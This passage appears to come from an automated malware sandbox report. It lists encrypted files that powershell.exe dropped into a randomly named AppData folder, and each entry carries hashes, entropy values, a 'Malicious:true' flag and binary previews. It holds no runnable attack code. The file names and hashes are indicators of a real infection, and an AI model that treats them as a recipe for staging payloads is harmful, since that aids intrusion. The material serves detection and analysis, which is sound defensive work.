                                                                                                    Preview: .s{s^.IP/...;.[.k".r...L.)^;i...0S.HJK.^.c..zN..........4 ..\.o...... 0..D.=.xn.j....../.8..l...1.C1..of2|..V?..8...h....^o._Q.=..!5=.......Q].[.4^U...W/B_.e...I(I..tZ..y.:J.H.w.?.M.CZ...L."...)....8..../.^/...a...g..-W.mxH...D..B....j..NU...+C...@. ...q..3...w... .n.]c*.y..P+..p.<..|,.....-I.S..L.St.j.a../.T...SJ..\&A`..OL.eZ.2..x....b..\.5.....).&[.......M!I.3WZ..<".......k.i..H..aM.w.k.s.N.z..9.=..I].3..Z..L.+.O.|..b-}......r....x.._S...3....r...r.....]....a..s{...K(.....p.\...%.%].81].v.1J...L.M.CI........}...Uu.p..T....PT2G........HDB.R.F.3^...LV.e./......td.^...'I.l...i. .o..I.$.`.YD.f@.........F..w.4H...-:..}.Q'4a..-LI}....^.;.A.4F.\K..Y..m.8fZaV^.!.+.J..{..k.h.... ....9.QD.B.{ ..|Y.M.L.....z.OJ~H}a.z5....7.^.._....sH.|.@iS.......G..3....Z.L...........[B..)...G..._..!..3&....y../.|..0.`..z..."..............&....D........).Be&.|R}..t.FD....\...%...J{.VPs......tD.o.D..N.....P.A?.P....lX.0fl8....Em6...(..^;....Cp
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GRQAtexpHVTru.NtlZsKHiDSEnvuQ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139072
                                                                                                    Entropy (8bit):7.998620767968988
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:UsDnjwxvqs/81927ruqfO+uqKAVTWYx5+41Lz9sx:tPwxvqs7rTWZbAV604CLx2
                                                                                                    MD5:C8FFD4DB78DF3D4B4BF25F44582284FE
                                                                                                    SHA1:AF614CE5CC1858DAA57A4E860F35E23040ACDE20
                                                                                                    SHA-256:7E7A4BF3B5989BACB91599963DD38C89FE89D2F0930EE252BA717BFD7586F3B4
                                                                                                    SHA-512:5AD73821A5709D428A36055C3820A8EB00915A6607785F891CA78FA300F0022F38A005F38CF7634315A21424078FEE7E7D5E078747A4D1E8B27CBBC80D6CEBF4
                                                                                                    Malicious:true
                                                                                                    Preview: {.'.g{...i..`. Z...hi.......(G.......^......(....s.a..dz.#H.!...@....<Y../.[Z...g.....t.0z..V...c../...-.ra......M.'".....Cms.)...Ao..b.u.......lT..@H9s..o....7....9.gm......-..z8 ............x\(.s..*...q..A.......=.=.dzx..x~L...R.K.."(c..:....ok...=6.. ..r,...<w..a....f._*.t,....=.Q.T.d...7..0v.#c.....-]X=ux#.>."&.`.-.:_....R....8.xCy.&d...=...dSf..n...w.h.d.Vm.(.TS..9:"U/!.e...l...T...0...g.]..F.s...4.@[V.......K...g...9....W.....W...uB-.1....O.E._....mR._..J|.B.E........\...e`.*..\.......Z...X..G^..O....F.oQ+s..,....I .. ...i.o.hE...b:.w0T..!V,...O...6....g..#.=a..R.S.k..T.5.Bc. ....C..G.H....N@z|)H..k...%...R.Xt.T.."........TlI.>..t..C.U.l.U.%q.%...g.p.>.|b....Y.._~.UZ..?:$...#O....YR..X:..;=.....Q.j...Q6....?A.....V......n..]...]...K......>..G.......].ll.\M97....C....N......'QE...t...A..............:.^...65...[.,=...!q..@!..."me...:.BL...U..".2.b.H-.......]C.......__..... ..^.F.a.f...$$.w.OC/_..P.L..EJim......R,q.&P^::.I>.........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GXbeLHsoBuP.PKFXbzfwHh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131793
                                                                                                    Entropy (8bit):7.998505262307247
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:n1BfbB0/Ip5p26/jwnlO1WeaSBoXcR8ar1oDoa4FAGEsz:XiKfklOojIoXYqD4Ea
                                                                                                    MD5:0FDD22C15088271CA8F16C6717379426
                                                                                                    SHA1:AE359F7C243CEFA44844E6F2576769026D28C162
                                                                                                    SHA-256:4183CEF578D4FFF8889DFF22634A803FF9295BD907564F377C17E5700CF8AA8E
                                                                                                    SHA-512:C6E610308AE8BEE1FB3092D19AC368FD59321BD0C47D6B206B6D6B9777BE1DD2108CCDB450A306F41C66E0F5C0DCBA8AA886964FA6194421106FCDF2C4F48EEB
                                                                                                    Malicious:true
                                                                                                    Preview: ...).........m.........r....T...^.8.ti................P_y,..D.*......R2....WJ]....>.3h..g.=..C.V\q....LRGT.....`F.)..oW..X........i....Q.....j...H*..]]..F.(/..8.......Gz.d......h{.u.^'s..(.*..vji.q.v3.yD.-[}a.E.,...pii^.....s.?^,.y..G..Je..;..h_..\Z....]3..W.~..4...:uC.&.oF.l.c.....3^q]..@O..{..^......F..N..H...8...Z{.a..3$.K.....$..a....M..)....]VA..F...}.........n[..m..L...d......?..;.?7.T.0.gV.S..c..U2..b>z.....r]...Hb:~.7...5..J.].q.v/...Q.X...0...x;.....fE...7h.....O.........J!.;.>?.Jct.R9[C..4.)h1......`...F....n....~.[.c..!...O.O...m.e..0..Dk.B.'8\.+4..1F...... ...M...z...\.(Iu.QB..e...i.1..(2.QW./!....(w.0..v.0.}ZpYi.%oH7......f./-._l.9.h...eU4...v..q..^.`;!..~............"4....&3.v...}.....^...`".......,{,.OW...+.....1O6..]s`...h#....u.u.a...)..4>.'.!.Ax*.o..Z.6.x91..l......,........A.g..q..3g.g.X..........E-.............1}j(+]..L...V..y>.,...Sr.. ......@{...p\.........+.Z......?.S.C[....yz"<:....%...fui........U
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GdEokeVIwBjhLc.nMRKpxCQFBdZcfXirWN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):184790
                                                                                                    Entropy (8bit):7.998913129135071
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:YKjk0VTkNXgsDI4Fjk0WEa0s8+2Q6X39am1ixBfF7BhjX0FBoPZ2Ii:YUjxMX1DI4Fo0Zat8+U0m1ud7BVXOBoE
                                                                                                    MD5:53A024C52674992B09D74E2A8A10D9AC
                                                                                                    SHA1:D20CA4896590133DFDCDB16ECBE8CAB4D774E2E0
                                                                                                    SHA-256:701C6662FE7D5EC3CB758F6EB77A28440F1F603D8A4264C9ECF6A71930571460
                                                                                                    SHA-512:0AB48F3F7E0145CB362FDF260CF23E306DEC4F5C98D094907A0138F014C2463B6C39DE585D9A20DA80A4E17FEF6D285FD405066054CE605B3EA1D179B66E5218
                                                                                                    Malicious:true
                                                                                                    Preview: .I:..v..b.0....?.....D/.#..q._..-.......c%<..P.v.e..R........o.i.sr.D....}....f0.....Y...A.D.v.........mQ......&Y..Hut..[^z..]JP.h......X.........S@....u.U.9.}A'A........0.l`r2..',...P..6d....nv..&.W......e..%U..L.@....F.....U.a....`..sA..Z..*TF.......g.+.OL.t.lf.fPq.aag$3...eG.-.....7...Y.).....2..m1..OJ*r.fW.M[...D:....N......E......6..~..aP..\....$..>H..s!\.m...A.M..>..Y........q$.}.sc..!.J.G..Nyb..Y.V&.8Y.......$G....z.*.Y.l.fVa...=d........0[=..y..^.$.N..0.%q......%K....JYn.c.9..M@..t.k..~c.XR.{|.6S....n.....[=.`...8 ..$Lk5..?....9.0Nj. ........mx......#9.s..X.s...~../..Zc.G...Q...R.k+0...,b..72...?.h.i.....VyQk.!.%.M.}F.j.....W:o.l..k......CR...=.U."....$....>....$...+...p7.S>.q.<o]..`].QA...6bv. .}...Q2..R....X.W.!.nV4.'.......t.)xM<..o......T...qd.&...R"...u..X+/4.LR..m5D2!.mv..9..vIkd......%V...m....0.iux..Ts...b..z...'.SH .N.(U........m.....?.[>zd.1.8... T.7.+..E%....l...q.@..-...?..j.%.c.~.a....hc.{..Q...r...&.g.l...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GlOhxqcnumdRbSM.XNFbAQxVOTE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126909
                                                                                                    Entropy (8bit):7.998731518461136
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CZonXARmeoPWQZCnFvTFsbNUEZRt8zNJJeStJPzt:CSnQRmeRXFriiE9qNJYSbLt
                                                                                                    MD5:0DBDFE9C9F817700B038355A0E201AF1
                                                                                                    SHA1:0B50DB946E647E19C80123EDB3026AA4E2873C58
                                                                                                    SHA-256:4A7D40D2834A67BE3E6EAA6AAD2578336801A4819BAFA4E912065863C8CD6608
                                                                                                    SHA-512:82125B633076756771F9E9DCE35CBA91DE7C77E875FF43D349C9A380F9420864CAE354F6BAEE55B1B88C1CDFCBE8699E1158050F0EEF80783ED86FAA61E84ECD
                                                                                                    Malicious:true
                                                                                                    Preview: ..olZ]..]...fOd...s#.l.Z...c9...U@n.Q..(R....Z0...C..&h...}xs#......:..J....R.....I...>?f.....Z.K:.Z.|V...~......."df....;..f! ..:..J.$......h.#("....XJ.^.A..b].S..4..q..n.{..w.C.I...f!..6.C.b...G..O..`...k.E.tG..>.u.H7.;..O..../DU.q....-..J....M........HX..Z.i....|.E,Y.V?".I..wL.*.\D...6.......[.....e...z...M>.o...r..VwMm.6..$.6t.J..8?...l.#\?...7..&.~.....m(..D.%.".3v.....J....I.wt:@,..}.Ws...a.......hUs.F..o..t...../...fF\.k...F.Dt{...F`....9?../............qD.0)R{........t".[S.=.&....9..'......_*...._h..s.|.4..na.q-GvH..}......x.].0/.<...e...3.....}....W......^`1...B..-R}....'.E.MI'..#....;.f....?A.?)._"@......F.....I.F~BJ<.z.W.....d...X.].Q ...AP. ....D......}...9ge!);Q.%3,!p.P9.c|l*P< f.....k..././..F....f.KR..i...*E.N]......6!\...&e...kt.q..{.a....u{.....V..)....d/.<N.g# .#..q8.....ti.}...DG.../..gZ'....%.-ix./vc.......A#.n.*..j.k.}....Z/.:...n.DG.a^..mK..U..W...'l..ol.W..=."..&m....4!4..........M:._.L......M...(....K..Zh...,/.`
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GwlaJKWHQYV.iEBDvALgUXGYQz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):188538
                                                                                                    Entropy (8bit):7.999106868441715
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:s+S4hyDuS8443kidsq0OVaF8vLVbobabJJkLyieKZSkOsdU2Tz1R7Rmj35BW6ck8:sSfkc0H2LYabJZieK3xdLTH7RmFp8
                                                                                                    MD5:86E027972AB7C76CD51DEF1ADBD57462
                                                                                                    SHA1:CC0D5202BB0979D0FF65486A1E543B0F0C0B048F
                                                                                                    SHA-256:2B7186BB53F0DDE5B44DAFC2F85CADDC16A13E0A8CCF552E35D667CCA0DE8825
                                                                                                    SHA-512:EF50C60CA14126FBB51EC526E6721477A063EAF51E1DB1501E388D9D857B6BF2B00D643AA8D3E26E0A0FFBD1060659F34B0300427703D706AD3DC19D9744F88A
                                                                                                    Malicious:true
                                                                                                    Preview: ....H.Y!q;..W..@hN*"e.._...g.z=u..!..KC.?.....f]..n....K.-....f.....@.%-.W..D...X.#..?........v....k.H../v...m....C.TQ...i..,kU...~^.:.d.Q...zVD..W.....34..^I;...&X......>.;....I..|.4......m......v.....|J...s.\.b.X..0.%..?..f%`.u..\.).4....j....u/.V...C.]....=.r..O..K9.x....h\...J:.5.<C..p?c....Lh.{.....s.u...@aw......!8..R.b._...IK....y.FT=c.....t_?...P......#......|.H&.:..u.Z...C.}F..I....b^.kn..........UaI=6a.Q..?J...a@........s...z.....:~..{.-HK.g*..As.q.l..j..+.....Z.1..C.d'~na...BY...i.....F.....d..r...?D[TQt...^..ie.`...5.G...E.U/1..*.H..*h44B....x.}.p.........x...;..`'l.*._W..%~.@_..12.+....|.)>.y._.`..E.Pi.xt..w....+.4oiop.......W.....M..X?......eUp..].}.N.:R..e.......r./.....T:..Q.R......q.&%=......\...(..'6z.d.v..Y.......Ru.....,.M...@-...5....C1..<....k7....h.;s.}......x..._..._#J..N...)%-Y&....vy...;..(.ANFBx...rjkU..0...Ql2....e}..%%..T....P.Q!.... A.r...*b.$.clF/.........'P.D#..u..O...>.Q)w..0....... S .-cS3.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\HguaokTAjUxvfBhViR.LoIMASDzvOQmCVFjgxt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):175934
                                                                                                    Entropy (8bit):7.999111448105421
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:u1gOmVP+2awu1cuOW87+WhfkvgKFCqEeCWpkw5A+ykThjqwX/IQgO:0NUPMH1/Op7LkYIVEeCWpfx1TNv/
                                                                                                    MD5:53C9EA885DDEAF32388C773FC6CE8F11
                                                                                                    SHA1:BF984558C95B2617A41171AE19747913ACA5B4A6
                                                                                                    SHA-256:03450805D3988F534CB982F40437C91DB70E56CF4E2D42D04C1B1ED20B22A990
                                                                                                    SHA-512:ADA1002A9C5E87B18B11EFAC17480808E2961496AEDE7ABBBC0382E77D6BCD40BEB64387A5AA2EA2C5676D3F2067029829E443A915DDFAF379541E6D05AB0B90
                                                                                                    Malicious:true
                                                                                                    Preview: ~pZ..W..>15.#/=.V...~..*T.+LFQ...K....2.N.S..3...@....z.=.~..XI.....p.0...y_.DlZ..C&.q.>...V...E.PR.mE.'...^..9....Q.5C$Ks...Q.W3...Q.V..d'.<)..].?>......"....4.../.G9.f.5..e.!....I8?..Z.R.|..6Hy......K......p."..Khc...@6.....Q.|kq....:J.}c....h.-.....M.H..^&.(.^.P#...)..d.aJ.H2$#..|].O.%..;.D..D.y....p.......#..#dW..a....1....f\.....h..75...~d.e.vq....v..J..a....nq.ek/l;.E...5P....r..dR.*...\......c.]:...O......]...M........{...i.p@7.9_..j.....d.q{....'...."~..h........"..e.._. .*.....C/hn......4~.k..*qj.....-^...!DC..q,....K ..*..t.]27.......j..:..D.T;.j....c.7..k..Y.w7.......0....3#'B....T.$-............^..2li..8..GA..VV.B.z..0w......If.e..x.i....)qV.I.K..7....[U...`S.=.....^.B...h.KE../j.......;c.....mZ.;-...X.`......!..[k.1t.j.3.A..b2...&.5./.F..TLC.....A..;....'.....+..&.?..Y.I...tN.Z3..n.R.s..*B{1.a0.1.........U.7.UB.v.="..\.dZ.C.n...@.|.V...M.....h./.v%...U..Eo..v%=.P.....hJ..~.".dzJZHN.....^..h.........:..T..#
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\HvBdpwFfxSjN.oevDUxZGEd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124031
                                                                                                    Entropy (8bit):7.998254399551055
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xVmUR0RGFwf2FODioqaekLFqiBex9rN0FMIWoN0uF59:xV4TfKo08DB2n0FMXw0uF59
                                                                                                    MD5:1C00220A973FC5B990C9340DF274D51B
                                                                                                    SHA1:30146191046976FF719CEB5AB83583918AD3F34C
                                                                                                    SHA-256:7FFD153BF430AEF6296BF7082D562256D5864AB1EE6861A2CDC014290F4A3907
                                                                                                    SHA-512:3BB6E87DF8817E074CDC61E8E7F33087869026FDFF1C2D0CDB061C58C88393E37583D4CB8498892119AB84D96F4DA62C29165280E60D114FEB15A58E3FB19658
                                                                                                    Malicious:true
                                                                                                    Preview: TM.3I..Q......u.l.}..G...:U{..?.'.N...[.l..6.&.O.<.rM....S\..o..g.h}....Vzq..;/.Cj...I.=..........p%..!...I...$.k{}n....{&w.M...:..2..:.....y.~D../Nq..Pf........6..M.C.7K....D...........*z...Pc.k9.H1..L."...\.]...%.|......_..1.Y[.7.^1.5..0N...uTj...w...4.mH+1...^M:.6.F...I...S.zr.#.......BV.Jm.\(....r.&k.\.\.d......Bz+~.1....H.9+.....r?._.jM.H.kK.t.Yc....Cl...t.8...#.APK.m..?.E4n.t..9..../.........s(.28.GJ..~.&.3E..f.-....~M^~...l..F.Bv.......;....SN...7 .......=........%.....%p3..?+a!....<.I.9..:._..............J......C..9..}..#..N..U..E.).v....y....P*....*Cah"....F.....4a_(LakD!...=.~.......S0......$.6.uz.w...G|.7.Y..lP..Q...s.H..9........PQ....}...|.k...gL...=a...L..5..g`.;6.......3.,!.T:..}I...1..J~..]@.1....ZQ.. ....xl..[q.r..oH....*o......y...TD-.Q$mz.5.Q..b.].tQ..P...l.{]..*..~.T..T?..Rq........L...kw>....]G.bV..X..i.O..........l..K...)7_VI...);..H.(b.6...G.k..B.....tt.{ks1S.pcj.$.]T....'{..`...u.R.X..r..">.9j....F.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\IgkbYrEeqtUHAWB.oveGZKBsrXjnqkgWlF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105931
                                                                                                    Entropy (8bit):7.998311889316311
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Wp/Q8z2vdHQkUkvDvGg0y18nP9zfTSxyaKTb6ZOG+PU7nKMvpOu6UzjPQ13RzAGZ:WK8z2lwgDvGqcPtQUbq3zKh0zgRcxWDd
                                                                                                    MD5:1A604E7C3B65548510612F92AD42F0F9
                                                                                                    SHA1:96A59ED085FDE70044418308D7D6CEF433236A52
                                                                                                    SHA-256:97CEBD4305658A90827A2A0300112B777046849412ED61CD49BE42068633C33F
                                                                                                    SHA-512:DAE7EAAE032C6DA92E7B3F638248CD89C0B5556AA6A0712DD3A419DBA577A19B7D8914D33A7EAAC266FBDFDC3990ECF15D412DE0390C0DD1681C7D62C8BE3A88
                                                                                                    Malicious:true
                                                                                                    Preview: |...)..........^.........7.]......F.D.|.u..z....U..."....'0..K.r.JM.wA0 .....K...c..#..$.E.D..n 91..[.NYd.T..R..o.R.'..S_....v.6_....:.B..*....z<...o.r..A..=.....]@4...\.....H.b...:.>.C@[.<K...M.....W.. ......6\...k..;C.gV...zL,g..KZ.7PY&.h..=(.e.O.;.M..5...,@...4~./.....P."R...R.......9V..'......5.e..N9...C...-E"8.?4...~.T.iI...$w.@g....s..p:...(..e.8..v.9.|..9.b.....=.!.....w.S...Q8..G...7p.P..W..v.n..^@..B.[..2~..B.E.#.,n..v.f.1L.@I_T.q.o.f$.......1.K2....'`...59...Q....J....n[6.....d..f.H{.}.M.Y.....8...........:.f..k~8.8..R.aZ;.]..z....u.../..Wu..-...Q...GO#.?.|&.....L.GrxV...G.0#..)........?.0..(P.a...y,..b.rn....EAM.6.7yz..R.:p..p.. .co88A.[...3d..]|..(..^.'....c...g...yH.........rZ.w..p.&.VV....~Q)q6:...Q.>...L.j...N......O."..t....8..].E1.n...XMy.....?..".}..-C6..&2..(.U|. .0D|.6.{.gZC..J...*.".1....|7G4.....X..7...y.<..K.X.hJ..w.0/......H.I.c...Nt.,8@.n.......X.........G#`.E.Kr.'kq...s.F..G{..b.M..L.F....%L.he
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JDmbluHkMAvRQPzwjN.hbTZiSnNFPrd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121848
                                                                                                    Entropy (8bit):7.998652191562647
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:6673LbDBqxxOWs3lUgVsxyi966yql9RJT7rVgek:6CWmlUgVOyieCg1
                                                                                                    MD5:9ABF47842ADADEE81BA235C59CE3B356
                                                                                                    SHA1:086B26B3930FBE24F01F04B9F508AB86777C0F62
                                                                                                    SHA-256:4D163A589DC77C8415472645A7EF75B52A6DAD54E50C5519A399EAE1DE80FF97
                                                                                                    SHA-512:383E86738268F9B27E35752DA3B54EE2B93A48F755DDF683572B51A2C71541A9899A5C72E351072C4582B4CBCAD37C238619D7844AF1015C9F13F3A9F75C0861
                                                                                                    Malicious:true
                                                                                                    Preview: ..D.N.V.D.KP&...........E../.>.0......CG..m..".4...U..3...&7.#..<..*...;+..R.g#..1.....v......QL.n.|..,9....5.V......X....+.BQ.1....<.z{_..@).^...gZ..o.|.J....>0.: m...w+G..`.I?/...;T..pp..N...^=.......8...\..$T.f..i*.....PS.....f.o.s.T....F.h.!xL..bXH-..Q..Z..R...}.J.p...~.2r...p..AO.?..&..k{.)g..x.1`....j..e...;..................&O.}.m.w..N..t....p.@E.*..a.......C=f>..o.. g_.d..1.......q.i.....c....N.y..g..2...b..7....ya........n?...="..7.H7."o<8.i....g.$w....0Bg........0*...DK.F.k.?.....S.m..e.I-T.C.6..aC..Q...<|..j.4=L.#.% ...4w.'.....t.......(.+...ps..q@~.U.r..,s..V.|.....g....I.9"..n.38%Z................H..@....).mD\A.].~.1.f..+......zg.*.O6n.v...'.$:[.K..........^....'}hYG..F...bw9..n...e@..#...'.(.2k...C....I.4..r0.....q..$....cE...m...E...%(y7.E$..5M`..&.B=D.W.ue.>........".O.>.I.|........./k...~D,..C."h....p..u..;Y.))jmO....G..fA..+.S.A.. {..*?.G.cE\p...]...p...m..e...\.VJ.T...... .r.....Jyb...$..,...... ~V.k:oaN..M..*.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JFYKMsSjbVLQNdTk.HpWmvDgAnrchQt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):118337
                                                                                                    Entropy (8bit):7.9984047476922875
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:02ozL1TbZ5JzhuOA5wTiYt/Kmqdl1vIAWuU:02ohbVzMY9t/KmqTkF
                                                                                                    MD5:3A1C1510BA4E81B11D0026927F962587
                                                                                                    SHA1:F38586EC4751F2B77BE8FC005FD323D72B926AE0
                                                                                                    SHA-256:64C7DFDC7204D44CC4ED00157063718D77A0326B411AE656A41270697CE4AA76
                                                                                                    SHA-512:1CA3998A18B5E4C53AB3F23B54D466D5EEC925F36FE41C7446FFE152940F28811F32616A36AFCF3F3EEC3043F67DBC8C6B115289E9816E9AADBECF51D835F397
                                                                                                    Malicious:true
                                                                                                    Preview: .m..S....B?.. B..>...'.....@......`c.}..s..k*... ..d..F..._F_&.......z9..][..~...%...,....).?.....|...<......1$m.M,:.g...<.LQ.`.I....M(.....Y8.m......&...X.T...c..Ck.$.Q.u......nMp.....{....L..v.)O...X.u.......8F....d..MW..d...F....cqE...'......pJ...$O1A..<Q..[w....Ctw.&n?.P.....\.|a.".4.<.u.`.}-..1\u.N)....$...F...3U.-..;......Nm...8...t...bGE)b..N.M.I.x.#(.;...3C..b`..2.fN...p...ik2F.....S......v.@....)H..|K.;"...:Qc3...^............7..rH...W.........i.h...[.iQc..........Ix.p+......._pI.....-... e....c...E./...ND..*...).MH..4......?.iv?..u|....y..{:.$....>...v$x*....}......l<AI..K..t..T7;...X.u..t(oLO....[h....,T.Sh.).....T(7r$. ?C.V]o.`.ds.)7.k ...$ET.....31`....Q0.....=.;....y`....[V.x.-.....q;"T.I...e.Q!.v..B...b..j.v..j$.% ..$.x{.,.I4V.......#.ez7v...4..N...'../.6.^....o.S+...y...pn.._.Y..x].L....Na.L....#......+?......k....x;.]..$$.1...^-.....]...L..O4......CP5.u.\..6@[.....T....@R...}.9#..yS.=P.....Ky<.+.:.f.N...Z..<..~.l'4..I..\ZF...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JhzcXlaPvHxmyw.TRmXshlKrzvDGiBycP
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):162222
                                                                                                    Entropy (8bit):7.999055928822681
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:t+vbh1avfHzpIKaLeeFEU13WUuwUe1IIS5GGarzbKY4j5UKfEKLZCG4AIbAwe74:e8H9gLdF/hWLF01rPKZj5lDLZCG4Tbt
                                                                                                    MD5:A2E7426D0361C6E03822C847FEC26D8C
                                                                                                    SHA1:1893776B3FE4F93A04FB58AACAC4545ED8F32E92
                                                                                                    SHA-256:E658586A3CFE242EDDB127BE0F24AD5415083F571C987203AE80F1C445F287D5
                                                                                                    SHA-512:D2D60BF43D705A6C734CFE825297EEE9E98D4CF0CECAF947CB8B9C5380C460287E85C859616864B598B5B5D348FE5B37356AFE0C3D711AC96913601B6B4B3EFB
                                                                                                    Malicious:true
                                                                                                    Preview: .o...m.1=P...*...TVL.P/..g.s...R:.....L..'.w7U....?..&..j..(.....m>..#6..N(]9..)..A.{.k%.#............L..|0..... -K..l....a.E..*...5......:Z#$....._.......uv7...U.BX.EU.=.1...\eL......v..qI._..Y.V..f@....t.........h.C..'../.....e.....!m..[.../.t.e...y.$)PE..N.b.l..K.....8.;.1D.Q.....l.....=f.F..p.`.j..WA......V..e..@.....J.......#.Sl+..n...q.|.I........n..~,a.wc..;l..(.$d..S....Q\..._.....;....7.k..Y..`4.i...0e...@...lS_.(B)x.n......-*.:..c..}K|.....Me8..........V...Zq.,R3.,..:....J.8.I.^..NUeh.\..Z...8.........HEby.zO..j..F./_..e.e...x....{..TG......l.......he.b..U2R.^.0|-t}....ew.....D..#.c-..$O..s....<..YcX.Y2..`.u.b.$j;o.O..Y9m......S. ..>.+0)'.H.h..9mzn.....%~.E.V@".A.X+.C.&...`.r.:..!.&e#..k....,...&.*..6....s......=....>..B.....L........i.`....r.y.K.....HM..........4+9Av.E..iWo!/..h|.TK.I...Kp.....N....T?.E.i...~g..a....a......m.;.:.7...e#'.e.".^2....{H..j.FW.`.T.../wF.j..........p{..D..=.Q..`.[......@....t.6)E....K....9.}.!<.j....F..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JlvCxXarWEkReOwQ.isJHCgwaAtNj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61992
                                                                                                    Entropy (8bit):7.997273463525382
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:XUnyBr+ZgODHsZwHjCUo7KwMhRpNiWyOqY2:XuyBSCOrL6+pNQY2
                                                                                                    MD5:5C6E5615EF3BDCFF02AA74890A6DC92D
                                                                                                    SHA1:BC5BA66438435D621231E814899917C5140C63E9
                                                                                                    SHA-256:43B0580598B56ABA052498B85ED3F92EC9B73A61C7D35D36E85D34469FE37CF1
                                                                                                    SHA-512:FB0922AA9F604456D6BF55A8B89FB1EDF0A8FAE48C7413C19F50ACE190178CD22D83362ADFB39078942D29005578046DA3318E3F889A5E5A4CA44B49BDE6D860
                                                                                                    Malicious:true
                                                                                                    Preview: ....?.J.....5.#G_..39EKg3.3....[3..h...]*...k..!.R>>.M0.h..|@.%...V.A.&...Kn`j,Vq..s.BD.8x.......Si).CfG......D....$q.c....}...1J.....-.E[]..}u4.L..."........m.(8....o+V...W0....'k.w.Ws(..{q..8.L.....Vd....Tm..........5.NX..z...]=/1.V.0?.."..h.&6...n.....k...o~.....f].+I.|.T..G.q........... .'fJ ...'|..j.IX.A....6..A&.c.....;......c.Y.W..W..../v.T...E.....\.M..!=.*p...m..:..@...\.+.. ZM........b....l.S.~.E.I..X.4..,......r>.s....y.5.'(p.y..[+....5...]S..<y.k1.DC.....>............q.{.3....t..O;.0Vb......[...g*.(.Q'.#fd.xJ.. ...wsZ...,....WYJ...3..tHm(.w...K...,.....u.!.W.~.d.?^U..K......ez.v.R...m.g'|.X..sxz.q..5K....J......T..#.? l.4w.+aJ...E......u....w......V..|.\.U>....6_N....Z.A..TB~....N.....6.....x....z..n..\;.....K..~....o....#$..r....c.r.uw.;..Y.0....>/.....\7I%...<H...hY`.XG.qO...e....k2..#=-n..&....7.../.T._.C)B$B/.8..<.D.2m......g.............+.u..^..~K......T7.L.0{.c..0..!.A....Z..E...|.......A.E|^......n..O..6+.Ei.#O>.3.k
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JmgZUkCGOnwBtYK.caxjFATNnCMOJfIuB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194052
                                                                                                    Entropy (8bit):7.999045490524826
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:vZngwf0HpYvNMo+Y7rNbTGZ2zBlXRKXb+CRgX42Qz9QrqBSEE57QuBMGpNx6xd9/:vZti4rRNztub9Rgiz9lSEE50ypz6xd9/
                                                                                                    MD5:6B33D14D93E04C5A56B5FC25824AB9B2
                                                                                                    SHA1:9D374790D2116B060A7283CB0B12EDAB060BA641
                                                                                                    SHA-256:2C12DF6DC272891D073CA0E2978347FF71678E0D904FF7FE8E31699BB1DBD53E
